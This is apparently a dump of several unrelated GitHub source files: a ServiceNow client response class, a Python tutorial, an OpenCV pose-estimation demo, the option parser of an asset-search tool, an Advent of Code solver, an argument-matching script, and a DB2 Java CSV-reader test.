InvalidContentMethod,\n RequestError,\n UnexpectedResponseContent,\n)\n\nfrom .schemas import ContentSchema\n\n\nclass Response(ClientResponse):\n \"\"\"Aiosnow Response class\n\n The Response object holds information about the ServiceNow HTTP response.\n\n Subclass of aiohttp.ClientResponse, its base reference documentation can be found here:\n https://docs.aiohttp.org/en/latest/client_reference.html#aiohttp.ClientResponse\n\n Attributes:\n - data: Deserialized (ContentSchema) response content\n - status: HTTP status code of response (int), e.g. 200\n - reason: HTTP status reason of response (str), e.g. 
\"OK\"\n - url: Request URL\n \"\"\"\n\n def __init__(self, *args: Any, **kwargs: Any):\n super(Response, self).__init__(*args, **kwargs)\n self.data: Union[list, dict, bytes, None] = None\n\n def __repr__(self) -> str:\n return (\n f\"<{self.__class__.__name__} {hex(id(self))} {self.url.path} \"\n f\"[{self.status} {self.reason}]>\"\n )\n\n def __getitem__(self, name: Any) -> Any:\n if isinstance(self.data, dict):\n return self.data.get(name)\n\n return None\n\n def __iter__(self) -> Iterable:\n if isinstance(self.data, list):\n yield from self.data\n elif isinstance(self.data, dict):\n yield from self.data.keys()\n else:\n raise InvalidContentMethod(f\"Cannot iterate over type: {type(self.data)}\")\n\n def __len__(self) -> int:\n if isinstance(self.data, list):\n return len(self.data)\n\n return 1\n\n async def load_document(self) -> None:\n \"\"\"Deserialize and set response content\n\n Raises:\n RequestError: If there was an error in the request-response content\n \"\"\"\n\n data = await self.json()\n\n if not isinstance(data, dict):\n if self.status == 204:\n self.data = {}\n return\n\n await self._handle_error()\n\n content = ContentSchema(unknown=EXCLUDE, many=False).load(data)\n\n if \"error\" in content:\n err = content[\"error\"]\n msg = (\n f\"{err['message']}: {err['detail']}\"\n if err[\"detail\"]\n else err[\"message\"]\n )\n\n raise RequestError(msg, self.status)\n\n self.data = content[\"result\"]\n\n async def _handle_error(self) -> None:\n \"\"\"Something went seriously wrong.\n\n This method interprets the error-response and raises the appropriate exception.\n\n Raises:\n - ServerError: If the error was interpreted as an unhandled server error\n - UnexpectedResponseContent: If the request was successful, but the request-response contains\n unexpected data\n \"\"\"\n\n try:\n # Something went wrong, most likely out of the ServiceNow application's control:\n # Raise exception if we got a HTTP error status back.\n self.raise_for_status()\n except (\n client_exceptions.ClientResponseError,\n http_exceptions.HttpProcessingError,\n ) as exc:\n raise ErrorResponse(exc.message, exc.code)\n except web_exceptions.HTTPException as exc:\n raise ErrorResponse(exc.text or \"\", exc.status)\n else:\n # Non-JSON content along with a HTTP 200 returned: Unexpected.\n text = await self.text()\n raise UnexpectedResponseContent(\n f\"Unexpected response received from server: {text}\", 200\n )\n","repo_name":"rbw/aiosnow","sub_path":"aiosnow/request/response/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"20543001452","text":"student = {'Tom', 'Jim', 'Mary', 'Tom', 'Jack', 'Rose'}\n\nprint(student) # 输出集合,重复的元素被自动去掉\n\n# 成员测试\nif 'Rose' in student :\n print('Rose 在集合中')\nelse :\n print('Rose 不在集合中')\n\n\n# set可以进行集合运算\na = set('abracadabra')\nb = set('alacazam')\n\nprint(a)\n\nprint(a - b) # a 和 b 的差集\n\nprint(a | b) # a 和 b 的并集\n\nprint(a & b) # a 和 b 的交集\n\nprint(a ^ b) # a 和 b 中不同时存在的元素\n\npara_str = \"\"\"这是一个多行字符串的实例\n多行字符串可以使用制表符\nTAB ( \\t )。\n也可以使用换行符 [ \\n ]。\n\"\"\"\nprint(para_str)\n\nname = 'Runoob'\nf'Hello {name}' # 替换变量\n\nf'{1+2}' # 使用表达式\n\nw = {'name': 'Runoob', 'url': 'www.runoob.com'}\nf'{w[\"name\"]}: 
{w[\"url\"]}'\n","repo_name":"hhggbb/pythonDemo","sub_path":"test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38476416275","text":"import cv2\nimport numpy as np\n\n# Dummy 3D points (replace these with actual 3D points from depth data)\n# For example, you can convert depth values to 3D points using the camera intrinsics\n# For simplicity, assuming Z=1 for all 3D points\nobject_points = np.array([[0, 0, 1],\n [1, 0, 1],\n [0, 1, 1],\n [1, 1, 1]], dtype=np.float32)\n\n# Dummy 2D points (replace these with actual 2D points from feature matching)\n# For example, these can be the keypoints detected in the RGB image\nimage_points = np.array([[10, 10],\n [20, 10],\n [10, 20],\n [20, 20]], dtype=np.float32)\n\n# Dummy camera intrinsic parameters (replace these with actual values)\n# For simplicity, assuming a simple pinhole camera model\nfx, fy = 500, 500 # focal length in pixels\ncx, cy = 320, 240 # principal point in pixels\n\n# Camera matrix\ncamera_matrix = np.array([[fx, 0, cx],\n [0, fy, cy],\n [0, 0, 1]], dtype=np.float32)\n\n# Distortion coefficients (assuming no distortion for simplicity)\ndist_coeffs = np.zeros((4, 1), dtype=np.float32)\n\n# Solve PnP problem to estimate camera pose\nsuccess, rotation_vector, translation_vector = cv2.solvePnP(object_points, image_points, camera_matrix, dist_coeffs)\n\n# Convert rotation vector to rotation matrix\nrotation_matrix, _ = cv2.Rodrigues(rotation_vector)\n\n# Print the estimated rotation matrix and translation vector\nprint(\"Estimated Rotation Matrix:\")\nprint(rotation_matrix)\nprint(\"\\nEstimated Translation Vector:\")\nprint(translation_vector)\n","repo_name":"aidan-pantoya/RowdyRover","sub_path":"SLAM/SLAMpy/cameraEst.py","file_name":"cameraEst.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5472241486","text":"# /usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File : option.py\n@Time : 2021/01/09 17:56:34\n@Author: Morker\n@Blog : https://96.mk/\n@Email : i@96.mk\n\nIf you don't go through the cold, you can't get the fragrant plum blossom.\n'''\n\nimport os\nimport sys\nimport random\nimport prettytable as pt\nfrom mod.fofa import fmain\nfrom mod.zoomeye import zmain\nfrom mod.quake import qmain\nfrom mod.website import mwebs\nfrom mod.rulesCli import ruleMain\nfrom mod.output import outMain\nfrom lib.proxy import checkProxyFile\nfrom lib.update import update\nfrom lib.common import getScheme\nfrom colorama import init as wininit\nfrom config.config import Version, tosayRun, Banner, fofaApi, zoomeyeApi\nfrom config.data import Urls, Paths, WebInfos, OutInfos, Proxys, confs, logger\n\n\ndef initOption(usage, root, args):\n wininit(autoreset=True)\n datas_init()\n set_path(root)\n program_start(usage)\n confs_init()\n add_options(args)\n set_confs()\n runmod()\n\n\ndef add_options(cmdparse):\n if hasattr(cmdparse, \"items\"):\n cmdlines = cmdparse.items()\n else:\n cmdlines = cmdparse.__dict__.items()\n\n for key, value in cmdlines:\n confs[key] = value\n\n\ndef set_path(root):\n Paths.root = root\n Paths.output = os.path.join(root, 'output')\n Paths.config = os.path.join(root, 'config')\n Paths.config_py = os.path.join(Paths.config, 'config.py')\n Paths.proxyFile = os.path.join(root, 'proxyFile')\n\n\ndef program_start(usage):\n print(random.choice(Banner))\n if tosayRun:\n from config.tosay 
import todaySay\n if todaySay():\n print(todaySay())\n else:\n pass\n if len(sys.argv) == 1:\n print(usage)\n exit(0)\n\n\ndef confs_init():\n confs.version = False\n confs.url = None\n confs.file = None\n confs.ip = None\n confs.web = None\n confs.proxy = None\n confs.proxylist = None\n confs.updateprogram = False\n confs.outputTarget = None\n confs.search = None\n\n\ndef set_confs():\n if confs.updateprogram:\n update()\n if confs.version:\n logger.info(\"Version: {0}\".format(Version))\n exit(0)\n if confs.search:\n searchType = [\"fofa\", \"eye\", \"qk\"]\n if confs.search in set(searchType):\n pass\n else:\n logger.error(\"参数错误,e.g.(-s fofa or -s eye or -s qk)\")\n exit(0)\n if confs.outputTarget:\n outTypes = [\"txt\", \"json\", \"html\", \"xls\", \"csv\"]\n if confs.outputTarget in set(outTypes):\n pass\n else:\n logger.error(\"输出格式错误,只支持输出格式为:{0}\".format(outTypes))\n exit(0)\n if confs.ip:\n Urls.ips.append(confs.ip)\n if confs.url:\n if not confs.url.startswith('http'):\n confs.url = \"http://\" + confs.url\n Urls.url.append(confs.url)\n if confs.file:\n with open(confs.file, 'r') as f:\n for ip in f.readlines():\n if len(ip) != 1:\n Urls.ips.append(ip.strip())\n if confs.web:\n with open(confs.web, 'r') as f:\n for web in f.readlines():\n if len(web) != 1:\n if not web.startswith('http'):\n web = \"http://\" + web\n Urls.url.append(web.strip())\n\n if isinstance(confs[\"proxy\"], str):\n if \":\" in confs[\"proxy\"]:\n splits = confs[\"proxy\"].split(\":\")\n try:\n if int(splits[2]):\n confs[\"proxy\"] = {splits[0]: \"{0}:{1}:{2}\".format(\n splits[0], splits[1], splits[2])}\n Proxys.proxyList.append(confs[\"proxy\"])\n except ValueError:\n logger.error(\n \"代理地址错误,例如:http://127.0.0.1:8080 or https://127.0.0.1:8080\")\n exit(0)\n elif confs[\"proxy\"] != \"all\" and confs[\"proxy\"] != \"cn\":\n logger.error(\n \"参数错误,all表示加载全部IP,cn加载国内IP,自定义例子为:http://127.0.0.1:8080 or https://127.0.0.1:8080\")\n exit(0)\n else:\n checkProxyFile(confs[\"proxy\"])\n if len(Proxys.proxyList) == 0:\n logger.error(\"本地获取代理失败,请从新获取\")\n message = input(\"是否不使用代理访问?[y/N]\")\n if message != \"y\":\n exit(0)\n else:\n logger.info(\"分配IP中\")\n getScheme()\n if confs.proxylist:\n if confs.proxylist == \"all\" or confs.proxylist == \"cn\":\n checkProxyFile(confs.proxylist)\n if len(Proxys.proxyList) == 0:\n logger.error(\"本地获取代理失败,请重新获取\")\n exit(0)\n else:\n tb = pt.PrettyTable()\n tb.field_names = ['Protocol', 'Host']\n for p in Proxys.proxyList:\n logger.info(p)\n for i in p:\n tb.add_row([i, p[i]])\n print(tb)\n logger.info(\"协议可切换,一般在代理插件里设置http协议,这样避免证书问题\")\n else:\n exit(0)\n\n\ndef runmod():\n if Urls.ips:\n if confs.search:\n if confs.search == \"fofa\":\n logger.info(\"调用Fofa接口中\")\n fmain(Urls.ips)\n if confs.search == \"eye\":\n logger.info(\"调用Zoomeye接口中\")\n zmain(Urls.ips)\n if confs.search == \"qk\":\n logger.info(\"调用Quake接口中\")\n qmain(Urls.ips)\n else:\n logger.error(\"参数错误,e.g.(-s fofa or -s eye or -s qk)\")\n exit(0)\n if Urls.url:\n mwebs()\n if WebInfos:\n ruleMain()\n else:\n logger.info(\"获取信息失败\")\n if OutInfos:\n if confs.outputTarget:\n outMain(confs.outputTarget)\n else:\n outMain(\"txt\")\n\n\ndef datas_init():\n Urls.url = []\n Urls.ips = []\n Urls.scheme = []\n Proxys.proxyList = []\n Proxys.scheme = []\n WebInfos = {}\n OutInfos = {}\n","repo_name":"s7ckTeam/Glass","sub_path":"lib/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":897,"dataset":"github-code","pt":"53"} 
+{"seq_id":"20151084491","text":"from __future__ import annotations\nfrom functools import partial\nfrom typing import Dict, List, Optional, Tuple\n\nfrom .utils import load_rows, split_row\n\nORBIT_MAP: Dict[str, O] = {}\n\n\nclass O:\n def __init__(self, name: str, direct_orbits: List[O]) -> None:\n self.name = name\n self.direct_orbits = direct_orbits\n self.orbittors: List[O] = []\n\n def __repr__(self) -> str:\n return self.name\n\n def orbit(self, o: O) -> None:\n self.direct_orbits.append(o)\n o.orbittors.append(self)\n\n @property\n def indirect_orbits(self) -> List[O]:\n return [\n orbits\n for neighbour in self.direct_orbits\n for orbits in neighbour.all_orbits\n ]\n\n @property\n def indirect_orbittors(self) -> List[O]:\n return [\n orbits for neighbour in self.orbittors for orbits in neighbour.all_orbittors\n ]\n\n @property\n def all_orbits(self) -> List[O]:\n return [*self.direct_orbits, *self.indirect_orbits]\n\n @property\n def all_orbittors(self) -> List[O]:\n return [*self.orbittors, *self.indirect_orbittors]\n\n\ndef process(input_list: List[str]) -> None:\n for inp in input_list:\n a, b = inp.strip(\"\\n\").split(\")\")\n if a not in ORBIT_MAP:\n ORBIT_MAP[a] = O(a, [])\n if b not in ORBIT_MAP:\n ORBIT_MAP[b] = O(b, [])\n ORBIT_MAP[b].orbit(ORBIT_MAP[a])\n\n\ndef find_path(a: O, b: O, visitors: Optional[List[O]] = None) -> Tuple[int, bool]:\n if visitors is None:\n visitors = []\n visitors.append(a)\n if b in a.direct_orbits or b in a.orbittors:\n return 0, True\n for neighbour in [*a.direct_orbits, *a.orbittors]:\n if neighbour in visitors:\n continue\n path = find_path(neighbour, b, visitors)\n if path[1]:\n return path[0] + 1, True\n return 0, False\n\n\nif __name__ == \"__main__\":\n ex_data = load_rows(\"ex6.in\", str)\n data = load_rows(\"day6.in\", str)\n\n process(ex_data)\n assert len(ORBIT_MAP[\"D\"].all_orbits) == 3\n assert len(ORBIT_MAP[\"L\"].all_orbits) == 7\n assert len(ORBIT_MAP[\"COM\"].all_orbits) == 0\n assert find_path(ORBIT_MAP[\"COM\"], ORBIT_MAP[\"H\"]) == (2, True)\n\n ORBIT_MAP = {}\n process(data)\n print(sum(len(orbit.all_orbits) for orbit in ORBIT_MAP.values()))\n print(find_path(ORBIT_MAP[\"SAN\"], ORBIT_MAP[\"YOU\"])[0] - 1)\n","repo_name":"Kruptein/AdventOfCode2019","sub_path":"aoc/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74364423206","text":"from src.conf.configuration import *\nimport pandas as pd\nimport csv\ndef load_args_me():\n args_argument_map={}\n path_df_arguments_preprocessed = get_preprocessed_path('args-me')\n dataframe_arguments = pd.read_csv(path_df_arguments_preprocessed,encoding=\"utf-8\",quotechar='\"',sep=\"|\",quoting=csv.QUOTE_ALL).dropna()\n conclusions = list(dataframe_arguments['conclusion'])\n premises = list(dataframe_arguments['premise'])\n ids = list(dataframe_arguments['argument_id'])\n\n for i,conclusion in enumerate(conclusions):\n\n premise = premises[i]\n argument= premise\n id = ids[i]\n args_argument_map[id] = argument\n return args_argument_map\n\ndef load_old_arguments():\n old_arguments_path = get_old_arguments_path()\n arguments_df = pd.read_csv(old_arguments_path)\n\n premises = list(arguments_df['Premise'])\n argument_id = list(arguments_df['Argument ID'])\n discussion_id = list(arguments_df['Discussion ID'])\n old_argument_map = {}\n for i,premise in enumerate(premises):\n\n\n argument = premise\n id = str(argument_id[i]) +\" \"+ str(discussion_id[i])\n 
old_argument_map[id]= argument\n return old_argument_map\n\ndef load_matches(matches_file):\n matches_file=open(matches_file,'r')\n args_me_argument_ids=[]\n old_argument_ids= []\n for line in matches_file:\n ids= line.split(\"\\t\")\n old_argument_id = ids[1].strip()\n args_me_argument_id = ids[0].strip()\n args_me_argument_ids.append(args_me_argument_id)\n old_argument_ids.append(old_argument_id)\n return zip(args_me_argument_ids,old_argument_ids)\n\ndef search_and_save_matches(path_matches_file, path_results, args_argument_map, old_argument_map):\n matches = load_matches(path_matches_file)\n matched_arguments_file = open(path_results, 'w')\n for args_me_argument_id, old_argument_id in matches:\n if old_argument_id == '-1':\n continue\n args_argument = args_argument_map[args_me_argument_id]\n old_argument = old_argument_map[old_argument_id]\n print(args_argument+\"\\n++++++++++++++++++++++\\n\"+old_argument+\"\\n\")\n matched_arguments_file.write(args_argument+\"\\n\"+old_argument+\"\\n\")\n matched_arguments_file.write(\"=================\\n\")\n\nold_argument_map = load_old_arguments()\nargs_argument_map = load_args_me()\nsearch_and_save_matches('/mnt/disk1/args-me-matching/lukas-argument-best-matches.txt','/mnt/disk1/args-me-matching/argument-best-matches.txt',args_argument_map,old_argument_map)\n\n","repo_name":"YamenAjjour/document-matching","sub_path":"archive/search_and_save_matches.py","file_name":"search_and_save_matches.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13884694561","text":"\nimport sys\nimport os\nimport ibm_db\nimport platform\nfrom texttable import Texttable\nfrom . import CommonTestCase\nfrom utils import mylog\nfrom multiprocessing import Value\nfrom ctypes import c_bool\nimport spclient_python\n\n__all__ = ['JavaRead_CSV']\n\nexecute_once = Value(c_bool, False)\n\nclass JavaRead_CSV(CommonTestCase):\n\n def __init__(self, test_name, extra_arg=None):\n super(JavaRead_CSV, self).__init__(test_name, extra_arg)\n self.rest_CSVREAD_found = False\n\n def runTest(self):\n super(JavaRead_CSV, self).runTest()\n if self.mDb2_Cli is None:\n return\n with execute_once.get_lock():\n if execute_once.value:\n mylog.debug(\"we already ran\")\n return\n execute_once.value = True\n self.filename = \"sp500_pcln_options.csv\"\n self.EXTBL_LOCATION = \"\"\n self.found = False\n self.send_file_error = False\n #self.test_unregister_java_jar_csv_by_storeproc()\n self.test_register_java_jar_csv_by_storeproc()\n self.test_register_java_csv_functions()\n self.test_send_sp500_pcln_options_csv()\n self.test_CSVREAD_present()\n self.test_use_java_csvRead()\n self.test_use_java_csvRead2()\n\n def setUp(self):\n super(JavaRead_CSV, self).setUp()\n mylog.debug(\"setUp\")\n\n def tearDown(self):\n super(JavaRead_CSV, self).tearDown()\n mylog.debug(\"tearDown\")\n\n def test_register_java_csv_functions(self):\n sql_str = \"\"\"\nCREATE OR REPLACE FUNCTION \n \"{schema}\".JAVA_CSVREAD(VARCHAR(255))\nRETURNS GENERIC TABLE\nEXTERNAL NAME 'UDFcsvReader!csvReadString'\nLANGUAGE JAVA\nSPECIFIC java_csvReadString\nPARAMETER STYLE DB2GENERAL\nVARIANT\nFENCED THREADSAFE\nNOT NULL CALL\nNO SQL\nNO EXTERNAL ACTION\nNO SCRATCHPAD\nNO FINAL CALL\nDISALLOW PARALLEL\nNO DBINFO\n@\n\nCREATE OR REPLACE FUNCTION \n \"{schema}\".JAVA_CSVREAD(\n VARCHAR(255),\n VARCHAR(255)\n )\nRETURNS GENERIC TABLE\nEXTERNAL NAME 'UDFcsvReader!csvRead'\nLANGUAGE JAVA\nSPECIFIC java_csvRead\nPARAMETER STYLE 
DB2GENERAL\nVARIANT\nFENCED THREADSAFE\nNOT NULL CALL\nNO SQL\nNO EXTERNAL ACTION\nNO SCRATCHPAD\nNO FINAL CALL\nDISALLOW PARALLEL\nNO DBINFO\n@\n\"\"\".format(schema = self.getDB2_USER())\n try:\n _ret = self.run_statement(sql_str)\n except Exception as i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n '''\n def test_unregister_java_jar_csv(self):\n try:\n cmds = ['db2 connect to sample',\n \"\"\"db2 \"CALL sqlj.remove_jar('%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER(),\n 'db2 terminate']\n self.call_cmd(cmds)\n\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n '''\n def test_unregister_java_jar_csv_by_storeproc(self):\n sql_str = \"\"\"CALL sqlj.remove_jar('%s.MY_CSV_READER_JAR')\"\"\" % self.getDB2_USER()\n mylog.info(\"executing \\n%s\\n\" % sql_str)\n try:\n stmt1 = ibm_db.callproc(self.conn, \"sqlj.remove_jar\", ('%s.MY_CSV_READER_JAR' % self.getDB2_USER(),))\n ibm_db.free_stmt(stmt1)\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n return 0\n\n def try_to_replace(self): \n try:\n sql_str = \"\"\"CALL sqlj.DB2_REPLACE_JAR('file:jar/restUDF.jar', '%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER()\n mylog.info(\"executing \\n%s\\n\" % sql_str)\n with open (\"jar/UDFcsvReader.jar\", \"rb\") as io_jar_blob:\n jar_blob = io_jar_blob.read()\n jar_id = '\"%s\".\"MY_CSV_READER_JAR\"' % self.getDB2_USER()\n stmt1 = ibm_db.prepare(self.conn, \"CALL sqlj.DB2_REPLACE_JAR (?,?)\")\n #self.mDb2_Cli.describe_parameters(stmt1)\n ibm_db.bind_param(stmt1, 1, jar_blob, ibm_db.SQL_PARAM_INPUT, ibm_db.SQL_BLOB)\n ibm_db.bind_param(stmt1, 2, jar_id)\n ret = ibm_db.execute(stmt1)\n\n ibm_db.free_stmt(stmt1)\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n def get_EXTBL_LOCATION(self):\n sql_str = \"\"\"\nSELECT \n VALUE\nFROM\n SYSIBMADM.DBCFG\nWHERE\n UPPER(NAME) = 'EXTBL_LOCATION'\n\"\"\" \n stmt = ibm_db.exec_immediate(self.conn, sql_str)\n dictionary = ibm_db.fetch_both(stmt)\n mylog.info(\"%s\" % dictionary)\n if dictionary:\n self.EXTBL_LOCATION = dictionary['VALUE']\n ibm_db.free_result(stmt)\n\n def get_tmp(self):\n if self.server_info.DBMS_NAME == \"DB2/NT64\":\n tmp_dir = os.getenv(\"TMP\", r\"c:\\tmp\\\\\")\n if not tmp_dir.endswith(\"\\\\\"):\n tmp_dir += \"\\\\\"\n else:\n self.get_EXTBL_LOCATION()\n tmp_dir = self.EXTBL_LOCATION\n return tmp_dir\n\n def test_file_presnt_on_host_fs(self):\n sql_str = \"\"\"\nCREATE OR REPLACE PROCEDURE FIND_FILE(\nIN filename VARCHAR(200),\nOUT found SMALLINT)\nBEGIN\n DECLARE v_filehandle UTL_FILE.FILE_TYPE;\n DECLARE isOpen BOOLEAN;\n DECLARE v_dirAlias VARCHAR(50) DEFAULT 'mydir';\n DECLARE v_filename VARCHAR(200) DEFAULT 'myfile.csv'; \n set found = -1;\n CALL UTL_DIR.CREATE_OR_REPLACE_DIRECTORY('mydir', '{_dir}');\n SET v_filename = filename;\n SET v_filehandle = UTL_FILE.FOPEN(v_dirAlias,v_filename, 'r');\n SET isOpen = UTL_FILE.IS_OPEN( v_filehandle );\n set found = 0;\n IF isOpen != TRUE THEN\n set found = -1;\n END IF;\n CALL UTL_FILE.FCLOSE(v_filehandle);\nEND\n@\n\"\"\"\n _dir = self.get_tmp()\n\n sql_str = sql_str.format(_dir=_dir)\n mylog.info(sql_str)\n\n self.run_statement(sql_str)\n try:\n stmt1 = ibm_db.prepare(self.conn, \"CALL FIND_FILE (?,?)\")\n self.mDb2_Cli.describe_parameters(stmt1)\n filename = self.filename\n out_found = 0\n ibm_db.bind_param(stmt1, 1, filename, ibm_db.SQL_PARAM_INPUT)\n ibm_db.bind_param(stmt1, 2, out_found, ibm_db.SQL_PARAM_OUTPUT, 
ibm_db.SQL_SMALLINT)\n _ret = ibm_db.execute(stmt1)\n mylog.info(\"%s\" % _ret)\n mylog.info(\"out_found %s\" % out_found)\n if out_found == 0:\n self.found = True\n else:\n self.found = False\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n return 0\n\n def test_register_java_jar_csv_by_storeproc(self):\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.info(\"DB2 mac doesnt supprt Java\")\n return 0\n\n try:\n sql_str = \"\"\"CALL sqlj.db2_install_jar('file:jar/UDFcsvReader.jar', '%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER()\n mylog.info(\"executing \\n%s\\n\" % sql_str)\n with open (\"jar/UDFcsvReader.jar\", \"rb\") as io_jar_blob:\n jar_blob = io_jar_blob.read()\n jar_id = '\"%s\".\"MY_CSV_READER_JAR\"' % self.getDB2_USER()\n stmt1 = ibm_db.prepare(self.conn, \"CALL sqlj.db2_install_jar (?,?)\")\n #self.mDb2_Cli.describe_parameters(stmt1)\n ibm_db.bind_param(stmt1, 1, jar_blob, ibm_db.SQL_PARAM_INPUT, ibm_db.SQL_BLOB)\n ibm_db.bind_param(stmt1, 2, jar_id)\n ret = ibm_db.execute(stmt1)\n\n ibm_db.free_stmt(stmt1)\n except Exception as _i:\n if \"SQL20201N \" in str(_i):\n ret = self.try_to_replace()\n if ret == 0:\n return 0\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n\n '''\n def test_register_java_jar_csv(self):\n\n try:\n cmds = ['db2 connect to sample',\n \"\"\"db2 \"CALL sqlj.install_jar('file:jar/UDFcsvReader.jar', '%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER(),\n 'db2 terminate']\n self.call_cmd(cmds)\n\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info()) \n return -1\n\n return 0\n '''\n def test_CSVREAD_present(self):\n \"\"\"\n \"\"\"\n self.rest_CSVREAD_found = self.if_routine_present(self.getDB2_USER(), \"JAVA_CSVREAD\")\n\n if not self.rest_CSVREAD_found:\n mylog.warning(\"UDF 'JAVA_CSVREAD' not present\")\n\n return 0\n\n def test_send_sp500_pcln_options_csv(self):\n \"\"\"I send the local file sp500_pcln_options.csv to the temp where DB2 is running...on the cloud ?\n local DB2 ? 
docker DB2 ?\n \"\"\"\n try:\n sql_str = \"\"\"\nDROP TABLE TEMP_CSV\n@\"\"\"\n if self.if_table_present(self.conn, \"TEMP_CSV\", self.getDB2_USER() ):\n self.run_statement(sql_str)\n\n file_to_read_path = os.path.join(os.getcwd(), self.filename)\n _dir, _name = os.path.split(file_to_read_path)\n spclient_python.send_file(self.conn, file_to_read_path, _name, mylog.info)\n\n stmt, name = ibm_db.callproc(self.conn, 'PROC_RENAME_FILE_LOCAL_FS', (_name, ))\n #mylog.debug(\"stmt %s\" % stmt)\n #mylog.info(\"name '%s'\" % name)\n if stmt is not None:\n mylog.info(\"Values of bound parameters _after_ CALL: '%s'\" % name)\n ibm_db.free_stmt(stmt)\n\n\n except Exception as _i:\n mylog.error(\"\\n%s %s\" % (type(_i), _i))\n self.send_file_error = True\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n def test_use_java_csvRead(self):\n \"\"\"Read sp500_pcln_options.csv using Java Table Function JAVA_CSVREAD\n this function is located under /jar/UDFcsvReader.jar\n the source code for UDFcsvReader.jar is under sqllib/samples/jdbc\n 'UDFcsvReader!csvReadString'\n \"\"\"\n\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.info(\"DB2 mac doesnt supprt Java\")\n return 0\n mylog.info(\"test_use_java_csvRead read JAVA_CSVREAD\")\n try:\n if self.send_file_error:\n mylog.warning(\"could not send csv file\")\n return 0\n\n self.set_file_to_read()\n\n exec_str = \"\"\"\nselect \n * \nfrom \n table(JAVA_CSVREAD('%s')) as TX ( \nStrike FLOAT,\nExpiry date,\nType varchar(10),\nSymbol varchar(30),\nLast FLOAT,\nBid FLOAT,\nAsk FLOAT,\nChg FLOAT,\nPctChg FLOAT,\nVol bigint, \nOpen_Int bigint,\nIV double,\nRoot varchar(30),\nIsNonstandard varchar(30),\nUnderlying varchar(30),\nUnderlying_Price float, \nQuote_Time timestamp, \nLast_Trade_Date timestamp)\n\"\"\" % self.file_to_read\n mylog.info(\"executing \\n%s\\n \" % exec_str)\n\n if not self.if_routine_present(self.getDB2_USER(), \"JAVA_CSVREAD\"):\n mylog.error(\"function 'JAVA_CSVREAD' not present\")\n self.fail(\"function 'JAVA_CSVREAD' not present\")\n return -1\n\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.warning(\"db2 10.1 on mac doesnt support java\")\n\n self.test_file_presnt_on_host_fs()\n if not self.found:\n mylog.warning(\"file is not presnt in the local fs %s..so this test will fail\" % self.file_to_read)\n return 0\n\n stmt1 = ibm_db.exec_immediate(self.conn, exec_str)\n self.mDb2_Cli.describe_columns(stmt1)\n\n dictionary = ibm_db.fetch_both(stmt1)\n #if dictionary:\n # mylog.info(\"dictionary keys %s\" % dictionary.keys())\n table = Texttable()\n table.set_deco(Texttable.HEADER)\n str_header = \"STRIKE Expiry Type Symbol Last Bid Ask Chg PctChg Vol Open_Int iv root IsNonstandard Underlying Underlying_Price Quote_Time Last_Trade_Date\"\n str_header = str_header.upper()\n header_list = str_header.split()\n table.header(header_list)\n table.set_cols_width([10, 22, 6, 30, 9, 9, 12, 10, 10, 8, 9, 12, 11,8, 11, 22, 21, 21])\n table.set_header_align(['l ' for _i in header_list])\n cont_rows = 0 \n while dictionary:\n my_row = []\n if cont_rows < 10:\n for column in header_list:\n my_row.append(dictionary[column])\n table.add_row(my_row)\n dictionary = ibm_db.fetch_both(stmt1)\n mylog.info(\"\\n%s\\n\" % table.draw())\n ibm_db.free_result(stmt1)\n\n except Exception as i:\n \n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n self.result.addExpectedFailure(self, sys.exc_info())\n mylog.warning(\"Mac doesn't have jdk db2 10.1 working\")\n mylog.warning(\"%s\" % i)\n return 0\n\n 
self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n def set_file_to_read(self):\n _dir = self.get_tmp()\n\n self.file_to_read = os.path.join(_dir, self.filename)\n\n def test_use_java_csvRead2(self):\n \"\"\"Read sp500_pcln_options.csv using Java Table Function JAVA_CSVREAD\n this function is located under /jar/UDFcsvReader.jar\n the source code for UDFcsvReader.jar is under sqllib/samples/jdbc\n 'UDFcsvReader!csvRead'\n \"\"\"\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.info(\"DB2 mac doesnt supprt Java\")\n return 0\n\n if self.send_file_error:\n mylog.warning(\"could not send csv file\")\n return 0\n\n list_fields = \"REAL, _DATE, VARCHAR, VARCHAR, real, real, real, real, real, bigInt, bigInt, double, varchar, varchar, varchar, real, _TIMESTAMP, _TIMESTAMP\"\n #list_fields = \"REAL, _DATE\"\n try:\n #file_to_read = os.path.join(os.getcwd(), \"sp500_pcln_options.csv\")\n self.set_file_to_read()\n\n exec_str = \"\"\"\nselect * from table(\n JAVA_CSVREAD(\n '%s',\n '%s')\n ) \n\nas some_table ( \n\"Strike hello\" real,\nExpiry date,\nType varchar(5),\nSymbol 